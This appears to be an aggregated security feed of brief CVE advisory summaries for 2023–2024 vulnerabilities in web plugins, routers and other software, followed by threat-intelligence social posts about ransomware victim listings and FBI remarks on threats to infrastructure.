CVE-2024-31744 -- In Jasper 4.2.2, the jpc_streamlist_remove function in src/libjasper/jpc/jpc_dec.c:2407 has an assertion failure vulnerability, allowing attackers to cause a denial of service attack through a specific image file.
CVE-2024-31745 -- Libdwarf v0.9.1 was discovered to contain a heap use-after-free via the dw_empty_errlist_item function at /libdwarf/dwarf_alloc.c.
CVE-2024-31750 -- SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.
CVE-2024-31841 -- An issue was discovered in Italtel Embrace 1.6.4. The web server fails to sanitize input data, allowing remote unauthenticated attackers to read arbitrary files on the filesystem.
CVE-2024-31846 -- An issue was discovered in Italtel Embrace 1.6.4. The web application does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
CVE-2024-31991 -- Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the safe_scrape_html function utilizes a user-controlled URL to issue a request to a remote server. Based on the content of the response, it will either parse the content or disregar
CVE-2024-31992 -- Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the safe_scrape_html function utilizes a user-controlled URL to issue a request to a remote server, however these requests are not rate-limited. While there are efforts to prevent DD
CVE-2024-31993 -- Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the scrape_image function will retrieve an image based on a user-provided URL, however the provided URL is not validated to point to an external location and does not have any enforc
CVE-2024-31994 -- Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, an attacker can point the image request to an arbitrarily large file. Mealie will attempt to retrieve this file in whole. If it can be retrieved, it may be stored on the file system
CVE-2024-32038 -- Wazuh is a free and open source platform used for threat prevention, detection, and response. There is a buffer overflow hazard in wazuh-analysisd when handling Unicode characters from Windows Eventchannel messages. It impacts Wazuh Manager 3.8.0 and abov
CVE-2024-32166 -- Webid v1.2.1 suffers from an Insecure Direct Object Reference (IDOR) - Broken Access Control vulnerability, allowing attackers to buy now an auction that is suspended (horizontal privilege escalation).
CVE-2024-32206 -- A stored cross-site scripting (XSS) vulnerability in the component \affiche\admin\index.php of WUZHICMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $formdata parameter.
CVE-2024-32391 -- Cross Site Scripting vulnerability in MacCMS v.10 v.2024.1000.3000 allows a remote attacker to execute arbitrary code via a crafted payload.
CVE-2024-32392 -- Cross Site Scripting vulnerability in CmSimple v.5.15 allows a remote attacker to execute arbitrary code via the functions.php component.
CVE-2024-32409 -- An issue in SEMCMS v.4.8 allows a remote attacker to execute arbitrary code via a crafted script.
CVE-2024-32478 -- Git Credential Manager (GCM) is a secure Git credential helper. Prior to 2.5.0, the Debian package does not set root ownership on installed files. This allows user 1001 on a multi-user system can replace binary and gain other users' privileges. This vulne
CVE-2024-32644 -- Evmos is a scalable, high-throughput Proof-of-Stake EVM blockchain that is fully compatible and interoperable with Ethereum. Prior to 17.0.0, there is a way to mint arbitrary tokens due to the possibility to have two different states not in sync during th
CVE-2024-32650 -- Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello
CVE-2024-32652 -- The adapter @hono/node-server allows you to run your Hono application on Node.js. Prior to 1.10.1, the application hangs when receiving a Host header with a value that `@hono/node-server` can't handle well. Invalid values are those that cannot be parsed b
CVE-2024-32683 -- Authorization Bypass Through User-Controlled Key vulnerability in Wpmet Wp Ultimate Review.This issue affects Wp Ultimate Review: from n/a through 2.2.5.
CVE-2024-3470 -- An Improper Privilege Management vulnerability was identified in GitHub Enterprise Server that allowed an attacker to use a deploy key pertaining to an organization to bypass an organization ruleset. An attacker would require access to a valid deploy key
CVE-2024-3560 -- The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _id value in all versions up to, and including, 4.2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes.
CVE-2024-3598 -- The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Creative Button widget in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping on user supplied attribute
CVE-2024-3600 -- The Poll Maker – Best WordPress Poll Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to a missing capability check on the ays_poll_maker_quick_start AJAX action in addition to insufficient escaping and sanitization in all vers
CVE-2024-3615 -- The Media Library Folders plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 8.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthe
CVE-2024-3646 -- A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the instance when configuring the chat integration. Exploitation of this vulner
CVE-2024-3654 -- An XSS vulnerability has been found in Teimas Global's Teixo, version 1.42.42-stable. This vulnerability could allow an attacker to send a specially crafted JavaScript payload via the "seconds" parameter in the program's URL, resulting in a possible takeo
CVE-2024-3684 -- A server side request forgery vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin access to the appliance when configuring the Artifacts & Logs and Migrations Storag
CVE-2024-3731 -- The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 5.47.0 due to insufficient input sanitization and output escaping. This makes it possible
CVE-2024-3818 -- The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's "Social Icons" block in all versions up to, and including, 4.5.9 due to insufficient input saniti
CVE-2024-3979 -- A vulnerability, which was classified as problematic, has been found in COVESA vsomeip up to 3.4.10. Affected by this issue is some unknown functionality. The manipulation leads to race condition. An attack has to be approached locally. The exploit has be
CVE-2024-4017 -- Improper Privilege Management vulnerability in BeyondTrust U-Series Appliance on Windows, 64 bit (filesystem modules) allows DLL Side-Loading.This issue affects U-Series Appliance: from 3.4 before 4.0.3.
CVE-2024-4018 -- Improper Privilege Management vulnerability in BeyondTrust U-Series Appliance on Windows, 64 bit (local appliance api modules) allows Privilege Escalation.This issue affects U-Series Appliance: from 3.4 before 4.0.3.
CVE-2023-3675 -- Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Secomea GateManager (Web GUI) allows Reading Data from System Resources.This issue affects GateManager: from 11.0.623074018 before 11.0.623373051.
CVE-2023-3758 -- A race condition flaw was found in sssd where the GPO policy is not consistently applied for authenticated users. This may lead to improper authorization issues, granting or denying access to resources inappropriately.
CVE-2023-41864 -- Cross-Site Request Forgery (CSRF) vulnerability in Pepro Dev. Group PeproDev CF7 Database.This issue affects PeproDev CF7 Database: from n/a through 1.8.0.
CVE-2023-4509 -- It is possible for an API key to be logged in clear text in the audit log file after an invalid login attempt.
CVE-2023-47843 -- Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Zachary Segal CataBlog.This issue affects CataBlog: from n/a through 1.7.0.
CVE-2023-49742 -- Missing Authorization vulnerability in Support Genix.This issue affects Support Genix: from n/a through 1.2.3.
CVE-2023-49768 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormAssembly / Drew Buschhorn WP-FormAssembly allows Stored XSS.This issue affects WP-FormAssembly: from n/a through 2.0.10.
CVE-2023-50885 -- Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AGILELOGIX Store Locator WordPress.This issue affects Store Locator WordPress: from n/a through 1.4.14.
CVE-2023-6892 -- The EAN for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'alg_wc_ean_product_meta' shortcode in all versions up to, and including, 4.8.7 due to insufficient input sanitization and output escaping on user s
CVE-2023-6897 -- The EAN for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.9.2 via the the 'alg_wc_ean_product_meta' shortcode due to missing validation on a user controlled key. This makes it po
CVE-2024-1426 -- The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘link’ attribute of the Price List w
CVE-2024-1429 -- The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘tab_link’ attribute of the Panel Sl
CVE-2024-20380 -- A vulnerability in the HTML parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
CVE-2024-23557 -- HCL Connections contains a user enumeration vulnerability. Certain actions could allow an attacker to determine if the user is valid or not, leading to a possible brute force attack.
CVE-2024-24910 -- A local attacker can escalate privileges on affected Check Point ZoneAlarm Extreme Security NextGen, Identity Agent for Windows, and Identity Agent for Windows Terminal Server. To exploit this vulnerability, an attacker must first obtain the ability to ex
CVE-2024-2729 -- The Otter Blocks WordPress plugin before 2.6.6 does not properly escape its mainHeadings blocks' attribute before appending it to the final rendered block, allowing contributors to conduct Stored XSS attacks.
CVE-2024-27306 -- aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. A XSS vulnerability exists on index pages for static file handling. This vulnerability is fixed in 3.9.4. We have always recommended using a reverse proxy server (e.g. nginx)
CVE-2024-2796 -- A server-side request forgery (SSRF) was discovered in the Akana Community Manager Developer Portal in versions prior to and including 2022.1.3. Reported by Jakob Antonsson.
CVE-2024-28076 -- The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerability. A potential attacker can redirect to different domain when using URL parameter with relative entry in the correct format
CVE-2024-28185 -- Judge0 is an open-source online code execution system. The application does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox. Whe
CVE-2024-28189 -- Judge0 is an open-source online code execution system. The application uses the UNIX chown command on an untrusted file within the sandbox. An attacker can abuse this by creating a symbolic link (symlink) to a file outside the sandbox, allowing the attack
CVE-2024-2833 -- The Jobs for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘job-search’ parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for u
CVE-2024-29001 -- A SolarWinds Platform SWQL Injection Vulnerability was identified in the user interface. This vulnerability requires authentication and user interaction to be exploited.
CVE-2024-29003 -- The SolarWinds Platform was susceptible to a XSS vulnerability that affects the maps section of the user interface. This vulnerability requires authentication and requires user interaction.
CVE-2024-29021 -- Judge0 is an open-source online code execution system. The default configuration of Judge0 leaves the service vulnerable to a sandbox escape via Server Side Request Forgery (SSRF). This allows an attacker with sufficient access to the Judge0 API to obtain
CVE-2024-29956 -- A vulnerability in Brocade SANnav before v2.3.1 and v2.3.0a prints the Brocade SANnav password in clear text in supportsave logs when a user schedules a switch Supportsave from Brocade SANnav.
CVE-2024-30107 -- HCL Connections contains a broken access control vulnerability that may expose sensitive information to unauthorized users in certain scenarios.
CVE-2024-30257 -- 1Panel is an open source Linux server operation and maintenance management panel. The password verification in the source code uses the != symbol instead hmac.Equal. This may lead to a timing attack vulnerability. This vulnerability is fixed in 1.10.3-lts
CVE-2024-30564 -- An issue inandrei-tatar nora-firebase-common between v.1.0.41 and v.1.12.2 allows a remote attacker to execute arbitrary code via a crafted script to the updateState parameter of the updateStateInternal method.
CVE-2024-30920 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the render-document.php component.
CVE-2024-30921 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the photo.php component.
CVE-2024-30922 -- SQL Injection vulnerability in DerbyNet v9.0 allows a remote attacker to execute arbitrary code via the where Clause in Award Document Rendering.
CVE-2024-30923 -- SQL Injection vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the where Clause in Racer Document Rendering
CVE-2024-30924 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the checkin.php component.
CVE-2024-30925 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the photo-thumbs.php component.
CVE-2024-30926 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the ./inc/kiosks.inc component.
CVE-2024-30927 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the racer-results.php component.
CVE-2024-30928 -- SQL Injection vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary SQL commands via 'classids' Parameter in ajax/query.slide.next.inc
CVE-2024-30929 -- Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the 'back' Parameter in playlist.php
CVE-2024-31229 -- Server-Side Request Forgery (SSRF) vulnerability in Really Simple Plugins Really Simple SSL.This issue affects Really Simple SSL: from n/a through 7.2.3.
CVE-2024-31869 -- Airflow versions 2.7.0 through 2.8.4 have a vulnerability that allows an authenticated user to see sensitive provider configuration via the "configuration" UI page when "non-sensitive-only" was set as "webserver.expose_config" configuration (The celery pr
CVE-2024-32126 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeroen Peters Navigation menu as Dropdown Widget allows Stored XSS.This issue affects Navigation menu as Dropdown Widget: from n/a through 1.3.4.
CVE-2024-32142 -- Missing Authorization vulnerability in Ovic Team Ovic Responsive WPBakery.This issue affects Ovic Responsive WPBakery: from n/a through 1.3.0.
CVE-2024-32325 -- TOTOLINK EX200 V4.0.3c.7646_B20201211 contains a Cross-site scripting (XSS) vulnerability through the ssid parameter in the setWiFiExtenderConfig function.
CVE-2024-32326 -- TOTOLINK EX200 V4.0.3c.7646_B20201211 contains a Cross-site scripting (XSS) vulnerability through the key parameter in the setWiFiExtenderConfig function.
CVE-2024-32327 -- TOTOLINK N300RT V2.1.8-B20201030.1539 contains a Store Cross-site scripting (XSS) vulnerability in Port Forwarding under the Firewall Page.
CVE-2024-32332 -- TOTOLINK N300RT V2.1.8-B20201030.1539 contains a Store Cross-site scripting (XSS) vulnerability in WDS Settings under the Wireless Page.
CVE-2024-32333 -- TOTOLINK N300RT V2.1.8-B20201030.1539 contains a Store Cross-site scripting (XSS) vulnerability in MAC Filtering under the Firewall Page.
CVE-2024-32334 -- TOTOLINK N300RT V2.1.8-B20201030.1539 contains a Store Cross-site scripting (XSS) vulnerability in IP/Port Filtering under the Firewall Page.
CVE-2024-32335 -- TOTOLINK N300RT V2.1.8-B20201030.1539 contains a Store Cross-site scripting (XSS) vulnerability in Access Control under the Wireless Page.
CVE-2024-32462 -- Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. in versions before 1.10.9, 1.12.9, 1.14.6, and 1.15.8, a malicious or compromised Flatpak app could execute arbitrary code outside its sandbox. Normally,
CVE-2024-32466 -- Tolgee is an open-source localization platform. For the `/v2/projects/translations` and `/v2/projects/{projectId}/translations` endpoints, translation data was returned even when API key was missing `translation.view` scope. However, it was impossible to
CVE-2024-32470 -- Tolgee is an open-source localization platform. When API key created by admin user is used it bypasses the permission check at all. This error was introduced in v3.57.2 and immediately fixed in v3.57.4.
CVE-2024-32473 -- Moby is an open source container framework that is a key component of Docker Engine, Docker Desktop, and other distributions of container tooling or runtimes. In 26.0.0, IPv6 is not disabled on network interfaces, including those belonging to networks whe
CVE-2024-32474 -- Sentry is an error tracking and performance monitoring platform. Prior to 24.4.1, when authenticating as a superuser to Sentry with a username and password, the password is leaked as cleartext in logs under the _event_: `auth-index.validate_superuser`. An
CVE-2024-32475 -- Envoy is a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with `auto_sni` enabled, a request containing a `host`/`:authority` header longer than 255 characters triggers an abnormal termination of Envoy process. Envo
CVE-2024-32477 -- Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. By using ANSI escape sequences and a race between `libc::tcflush(0, libc::TCIFLUSH)` and reading standard input, it's possible to manipulate the permission prompt and force it
CVE-2024-32551 -- Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smartypants SP Project & Document Manager.This issue affects SP Project & Document Manager : from n/a through 4.71.
CVE-2024-32552 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tagbox Taggbox allows Stored XSS.This issue affects Taggbox: from n/a through 3.2.
CVE-2024-32553 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in looks_awesome Superfly Menu allows Stored XSS.This issue affects Superfly Menu: from n/a through 5.0.25.
CVE-2024-32554 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Knight Lab Knight Lab Timeline allows Stored XSS.This issue affects Knight Lab Timeline: from n/a through 3.9.3.4.
CVE-2024-32556 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nabil Lemsieh HurryTimer allows Stored XSS.This issue affects HurryTimer: from n/a through 2.9.2.
CVE-2024-32558 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in impleCode eCommerce Product Catalog allows Reflected XSS.This issue affects eCommerce Product Catalog: from n/a through 3.3.32.
CVE-2024-32559 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hwk-fr WP 404 Auto Redirect to Similar Post allows Reflected XSS.This issue affects WP 404 Auto Redirect to Similar Post: from n/a through 1.0.4.
CVE-2024-32560 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sharabindu QR Code Composer allows Stored XSS.This issue affects QR Code Composer: from n/a through 2.0.3.
CVE-2024-32561 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tagembed allows Stored XSS.This issue affects Tagembed: from n/a through 4.7.
CVE-2024-32562 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VIICTORY MEDIA LLC Z Y N I T H allows Stored XSS.This issue affects Z Y N I T H: from n/a through 7.4.9.
CVE-2024-32563 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VikBooking Hotel Booking Engine & PMS allows Reflected XSS.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through 1.6.7.
CVE-2024-32564 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Post Grid Team by WPXPO PostX – Gutenberg Blocks for Post Grid allows Stored XSS.This issue affects PostX – Gutenberg Blocks for Post Grid: from n/a thro
CVE-2024-32565 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Appcheap.Io App Builder allows Stored XSS.This issue affects App Builder: from n/a through 3.8.8.
CVE-2024-32566 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Club Manager allows Stored XSS.This issue affects WP Club Manager: from n/a through 2.2.11.
CVE-2024-32567 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Designinvento DirectoryPress allows Reflected XSS.This issue affects DirectoryPress: from n/a through 3.6.7.
CVE-2024-32568 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Melapress WP 2FA allows Reflected XSS.This issue affects WP 2FA: from n/a through 2.6.2.
CVE-2024-32569 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metaphor Creations Ditty allows Stored XSS.This issue affects Ditty: from n/a through 3.1.31.
CVE-2024-32571 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in naa986 WP Stripe Checkout allows Stored XSS.This issue affects WP Stripe Checkout: from n/a through 1.2.2.41.
CVE-2024-32572 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BdThemes Element Pack Elementor Addons allows Stored XSS.This issue affects Element Pack Elementor Addons: from n/a through 5.6.0.
CVE-2024-32573 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Stored XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.5.11.
CVE-2024-32574 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani WP Simple HTML Sitemap allows Reflected XSS.This issue affects WP Simple HTML Sitemap: from n/a through 2.8.
CVE-2024-32575 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kraftplugins Mega Elements allows Stored XSS.This issue affects Mega Elements: from n/a through 1.1.9.
CVE-2024-32577 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr Team CBX Bookmark & Favorite cbxwpbookmark allows Stored XSS.This issue affects CBX Bookmark & Favorite: from n/a through 1.7.20.
CVE-2024-32578 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10Web Slider by 10Web allows Reflected XSS.This issue affects Slider by 10Web: from n/a through 1.2.54.
CVE-2024-32579 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GloriaFood Restaurant Menu – Food Ordering System – Table Reservation allows Stored XSS.This issue affects Restaurant Menu – Food Ordering System – Table
CVE-2024-32580 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Averta Master Slider allows Stored XSS.This issue affects Master Slider: from n/a through 3.9.8.
CVE-2024-32581 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lenderd Mortgage Calculators WP allows Stored XSS.This issue affects Mortgage Calculators WP: from n/a through 1.56.
CVE-2024-32582 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bowo Debug Log Manager allows Stored XSS.This issue affects Debug Log Manager: from n/a through 2.3.1.
CVE-2024-32583 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Photo Gallery Team Photo Gallery by 10Web allows Reflected XSS.This issue affects Photo Gallery by 10Web: from n/a through 1.8.21.
CVE-2024-32584 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StandaloneTech TeraWallet – For WooCommerce allows Stored XSS.This issue affects TeraWallet – For WooCommerce: from n/a through 1.5.0.
CVE-2024-32585 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in extendWP Import Content in WordPress & WooCommerce with Excel allows Reflected XSS.This issue affects Import Content in WordPress & WooCommerce with Exce
CVE-2024-32586 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Munir Kamal Gutenberg Block Editor Toolkit allows Stored XSS.This issue affects Gutenberg Block Editor Toolkit: from n/a through 1.40.4.
CVE-2024-32587 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EnvialoSimple EnvíaloSimple allows Reflected XSS.This issue affects EnvíaloSimple: from n/a through 2.2.
CVE-2024-32588 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress Export Import allows Reflected XSS.This issue affects LearnPress Export Import: from n/a through 4.0.3.
CVE-2024-32590 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webfood Kattene allows Stored XSS.This issue affects Kattene: from n/a through 1.7.
CVE-2024-32591 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Daniele De Rosa Backend Designer allows Stored XSS.This issue affects Backend Designer: from n/a through 1.3.
CVE-2024-32592 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VoidCoders, innovs Void Elementor WHMCS Elements For Elementor Page Builder allows Stored XSS.This issue affects Void Elementor WHMCS Elements For Elemen
CVE-2024-32593 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPBits WPBITS Addons For Elementor Page Builder allows Stored XSS.This issue affects WPBITS Addons For Elementor Page Builder: from n/a through 1.3.4.2.
CVE-2024-32594 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AttesaWP Attesa Extra allows Stored XSS.This issue affects Attesa Extra: from n/a through 1.3.9.
CVE-2024-32595 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mat Bao Corp WP Helper Premium allows Reflected XSS.This issue affects WP Helper Premium: from n/a before 4.6.0.
CVE-2024-32596 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eric-Oliver Mächler DSGVO Youtube allows Stored XSS.This issue affects DSGVO Youtube: from n/a through 1.4.5.
CVE-2024-32597 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Xylus Themes WordPress Importer allows Stored XSS.This issue affects WordPress Importer: from n/a through 1.0.7.
CVE-2024-32598 -- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Booking Algorithms BA Book Everything allows Stored XSS.This issue affects BA Book Everything: from n/a through 1.6.8.
CVE-2024-32599 -- Improper Control of Generation of Code ('Code Injection') vulnerability in Deepak anand WP Dummy Content Generator.This issue affects WP Dummy Content Generator: from n/a through 3.2.1.
CVE-2024-32600 -- Deserialization of Untrusted Data vulnerability in Averta Master Slider.This issue affects Master Slider: from n/a through 3.9.5.
CVE-2024-32601 -- Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Popup Anything.This issue affects Popup Anything: from n/a through 2.8.
CVE-2024-32602 -- Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in OnTheGoSystems WooCommerce Multilingual & Multicurrency.This issue affects WooCommerce Multilingual & Multicurrency: from n/a through 5.3.3.1.
CVE-2024-32603 -- Deserialization of Untrusted Data vulnerability in ThemeKraft WooBuddy.This issue affects WooBuddy: from n/a through 3.4.20.
CVE-2024-32604 -- Authorization Bypass Through User-Controlled Key vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.
CVE-2024-32686 -- Insertion of Sensitive Information into Log File vulnerability in Inisev Backup Migration.This issue affects Backup Migration: from n/a through 1.4.3.
CVE-2024-32689 -- Missing Authorization vulnerability in GenialSouls WP Social Comments.This issue affects WP Social Comments: from n/a through 1.7.3.
CVE-2024-3741 -- Electrolink transmitters are vulnerable to an authentication bypass
CVE-2024-3928 -- A vulnerability was found in Dromara open-capacity-platform 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /actuator/heapdump of the component auth-server. The manipulation leads to infor
CVE-2024-3931 -- A vulnerability was found in Totara LMS 18.0.1 Build 20231128.01. It has been rated as problematic. Affected by this issue is some unknown functionality of the file admin/roles/check.php of the component Profile Handler. The manipulation of the argument I
CVE-2024-3932 -- A vulnerability classified as problematic has been found in Totara LMS 18.0.1 Build 20231128.01. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been discl
CVE-2024-3948 -- A vulnerability was found in SourceCodester Home Clean Service System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file \admin\student.add.php of the component Photo Handler. The manipulation leads to unr
Director Wray's Remarks at the Vanderbilt Summit on Modern Conflict and Emerging Threats | fbi.gov/news/speeches/direct… @FBI -- 780thC
Chinese Government Poses 'Bold and Unrelenting' Threat to U.S. Critical Infrastructure, FBI Director Says | fbi.gov/news/stories/chinese… @FBI -- 780thC
Intelligence Specialist (Operations) GG-12 with the @780thC, Fort Meade, MD, conducting mission analysis, developing Courses of Action, and coordinating planning with adjacent and higher Army units and Joint commands. Open: April 19 to 29, 2024, usajobs.g -- 780thC
$65 billion South Korean giant Hanwha Azdel has been breached by Black Basta./azdel[.]com -- alvieriD
Regional hospital call center Call4Health allegedly breached by LockBit. -- alvieriD
rebrand context -- alvieriD
BianLian #ransomware group has added 2 new victims to their #darkweb portal.- JE Owens and Company- Western Saw, Inc#USA#BianLian #darkweb #databreach #cyberattack #cti -- FalconFeedsio
NoName claims to have targeted multiple websites in Spain.- Rural Bank Group- Sabadell Bank#Spain#ddos #cyberattack #cti #threatintel -- FalconFeedsio
Akira #ransomware group has added Myers Auto Group (myers.ca) to their victim list.#Canada#akira #cyberattack #darkweb #databreach -- FalconFeedsio
A threat actor claims to have leaked the database of the El Salvador Ministry of Education (mined.gob.sv) to the hackers' forum.#ElSalvador#darkweb #cyberattack #databreach #cti -- FalconFeedsio
A threat actor claims to have leaked the database of Companies House (companieshouse.gov.uk) to the hackers' forum.#UK#darkweb #cyberattack #databreach #cti -- FalconFeedsio
LockBit #ransomware group has added 2 new victims to their #darkweb portal.- Sierra Construction Group 🇨🇦- Call 4 Health 🇺🇸#Canada#USA#lockbit #cyberattack #databreach #cti -- FalconFeedsio
BlackBasta #ransomware group has added 5 new victims to their #darkweb portal.- Hanwha Azdel 🇰🇷🇰- Macphie Ltd 🇬🇧- Cavotec SA 🇨🇭- Hymer-Leichtmetallbau GmbH & Co. KG 🇩🇪- Fluent Home 🇨🇦#South Korea #UK #Switzerland #Germany #Canada#blackbasta #databreach -- FalconFeedsio
PLAY #ransomware group has added 6 new victims to their #darkweb portal.- Alltruck Bodies 🇦🇺 - SIS Automatisering 🇳🇱 - Pennsylvania Convention Center 🇺🇸- Engineered Automation of Maine 🇺🇸- JE Owens 🇺🇸- P??????? & ???? 🇺🇸#Australia #Netherlands #USA#play # -- FalconFeedsio
HUNTERS INTERNATIONAL #ransomware group has added Mid South Health Systems (arisahealth.org) to their victim list.#USA#huntersinternational #cti #cyberattack #darkweb #databreach -- FalconFeedsio
Qilin #ransomware group has added etateam (etateam.be) to their victim list.#Belgium#qilin #cyberattack #darkweb #databreach -- FalconFeedsio
MEDUSA #ransomware group has added NORTHEAST OHIO NEIGHBORHOOD HEALTH SERVICES (neonhealth.org) to their victim list.#USA#medusa #cyberattack #darkweb #databreach -- FalconFeedsio
Octo Tempest is known for deploying BlackCat ransomware for extortion. msft.it/6012YDwpo -- MsftSecIntel
Among ransomware actors, Octo Tempest continues to be especially prolific, using advanced social engineering methods, incl. sim swapping, tricking targets into updating authentication methods, & initiating password reset requests, to gain access to highly -- MsftSecIntel
